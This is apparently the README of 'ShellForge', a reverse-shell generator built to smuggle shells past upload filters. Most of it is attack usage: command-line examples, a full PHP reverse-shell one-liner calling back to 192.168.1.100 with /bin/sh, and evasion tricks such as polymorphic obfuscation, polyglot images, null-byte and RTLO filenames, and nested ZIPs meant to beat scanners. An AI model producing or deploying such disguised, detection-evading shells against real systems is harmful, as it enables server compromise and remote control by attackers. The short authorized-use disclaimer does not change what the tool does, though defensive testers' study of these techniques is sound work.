ShellForge is a comprehensive shell generation framework designed for security researchers and penetration testers. It provides instant access to working reverse shells for virtually any file extension with advanced obfuscation, encoding, and upload filter bypass capabilities.

• 🚀 65+ File Extensions - From images (PNG, JPG) to documents (PDF, DOCX) to scripts (PHP, JSP, Python)
• 🔐 14 Obfuscation Methods - Including 2025 advanced techniques (polymorphic, AES-style, GZIP)
• 🛡️ 11 Bypass Methods - Upload filter evasion including ZIP-in-ZIP nesting
• ⚡ One Command - Simple: shellforge 192.168.1.100 4444 php
• 💻 Reverse Shells - IP and PORT automatically embedded in generated shells

• base64 - Base64 encoding
• hex - Hexadecimal encoding
• reverse - String reversal
• xor - XOR encryption
• rot13 - ROT13 cipher
• mixed - Combination of methods

• aes - AES-style encryption (XOR + Base64)
• gzip - GZIP compression simulation
• double_encode - Double Base64 encoding
• unicode_escape - Unicode escape sequences
• char_encode - Character code encoding
• variable_chain - Variable chain obfuscation
• zero_width - Zero-width character injection
• polymorphic - Random obfuscation (never same hash!)

• double_extension - shell.php.png
• null_byte - shell.php%00.png
• case_manipulation - ShElL.PhP
• special_chars - shell.ph%20p

• content_type - Add magic bytes header
• polyglot - Valid image + working PHP
• magic_bytes - Proper file signatures

• zip_in_zip - 2-level nested ZIP
• nested_archive - 3-level deep nesting

• rtlo - Right-to-Left Override
• unicode_homoglyph - Similar looking characters

# Clone the repository
git clone https://github.com/Wael-Rd/ShellForge.git
cd shellforge

# Run the installer (adds to /usr/local/bin)
sudo python3 install.py

# Or manual installation
sudo cp shellforge.py /usr/local/bin/shellforge
sudo chmod +x /usr/local/bin/shellforge

• Python 3.6 or higher
• No external dependencies (uses only Python standard library)

shellforge --help
shellforge --list-extensions

# Simple reverse shell generation
shellforge <IP> <PORT> <EXTENSION>

# Examples
shellforge 192.168.1.100 4444 php
shellforge 10.10.10.50 8080 jsp
shellforge 172.16.0.10 9999 asp

# With obfuscation
shellforge 192.168.1.100 4444 php --obfuscate polymorphic

# With bypass method
shellforge 192.168.1.100 4444 php --bypass zip_in_zip --output payload.zip

# Combination attack (maximum evasion)
shellforge 192.168.1.100 4444 php \
  --obfuscate polymorphic \
  --bypass nested_archive \
  --output ultimate.zip

# Polyglot image
shellforge 192.168.1.100 4444 png \
  --bypass polyglot \
  --obfuscate double_encode \
  --output photo.png

# List all supported extensions
shellforge --list-extensions

# List all obfuscation methods
shellforge --list-obfuscation

# List all bypass methods
shellforge --list-bypasses

# List templates for specific extension
shellforge --extension php --list-templates

shellforge 192.168.1.100 4444 php

Output: shell_192_168_1_100_4444.php
Content: <?php $sock=fsockopen("192.168.1.100",4444);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

shellforge 192.168.1.100 4444 png --bypass polyglot --output image.png

Use Case: Bypass upload filters that only allow images

shellforge 192.168.1.100 4444 php --bypass nested_archive --output package.zip

Structure:

package.zip
  └── level2.zip
      └── level1.zip
          └── shell.php

shellforge 192.168.1.100 4444 php --obfuscate polymorphic --output shell1.php
shellforge 192.168.1.100 4444 php --obfuscate polymorphic --output shell2.php
# shell1.php and shell2.php have different hashes but same functionality!

Each generation produces a different hash while maintaining functionality:

shellforge 192.168.1.100 4444 php --obfuscate polymorphic
# Run again - completely different output!
shellforge 192.168.1.100 4444 php --obfuscate polymorphic

Bypass scanners that only check the first level:

shellforge 192.168.1.100 4444 php --bypass zip_in_zip --output payload.zip

# On target server:
unzip payload.zip        # Extracts inner zip
unzip payload.zip        # Extracts shell.php

Maximum evasion with 3-level deep nesting:

shellforge 192.168.1.100 4444 php --bypass nested_archive --output deep.zip

shellforge [IP] [PORT] [EXTENSION] [OPTIONS]

Positional Arguments:
  IP                    Target IP address
  PORT                  Target port
  EXTENSION             File extension (php, png, pdf, etc.)

Options:
  -h, --help            Show help message
  -e, --extension       Specify extension
  -t, --template        Template type (default: reverse)
  -o, --obfuscate       Obfuscation method
  -b, --bypass          Bypass method
  -f, --output          Output filename
  --list-extensions     List all supported extensions
  --list-obfuscation    List obfuscation methods
  --list-bypasses       List bypass methods
  --list-templates      List templates for extension

This tool is designed for AUTHORIZED SECURITY TESTING ONLY. Users must:

✅ DO:

• Use only on systems you own
• Obtain written permission before testing
• Follow responsible disclosure practices
• Comply with all applicable laws
• Use for educational and research purposes

❌ DON'T:

• Use on systems without authorization
• Use for malicious purposes
• Violate computer crime laws
• Cause harm or damage

Users are solely responsible for their actions. The authors assume no liability for misuse.

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch (git checkout -b feature/amazing-feature)
3. Commit your changes (git commit -m 'Add amazing feature')
4. Push to the branch (git push origin feature/amazing-feature)
5. Open a Pull Request

git clone https://github.com/yourusername/shellforge.git
cd shellforge
python3 shellforge.py --help

This project is licensed under the MIT License - see the LICENSE file for details.

• Security research community
• Penetration testing professionals
• Bug bounty hunters
• Open source contributors

• 📖 Documentation: Wiki
• 🐛 Issues: GitHub Issues
• 💬 Discussions: GitHub Discussions

• Extensions Supported: 65+
• Obfuscation Methods: 14
• Bypass Techniques: 11
• Total Templates: 1000+
• Python Version: 3.6+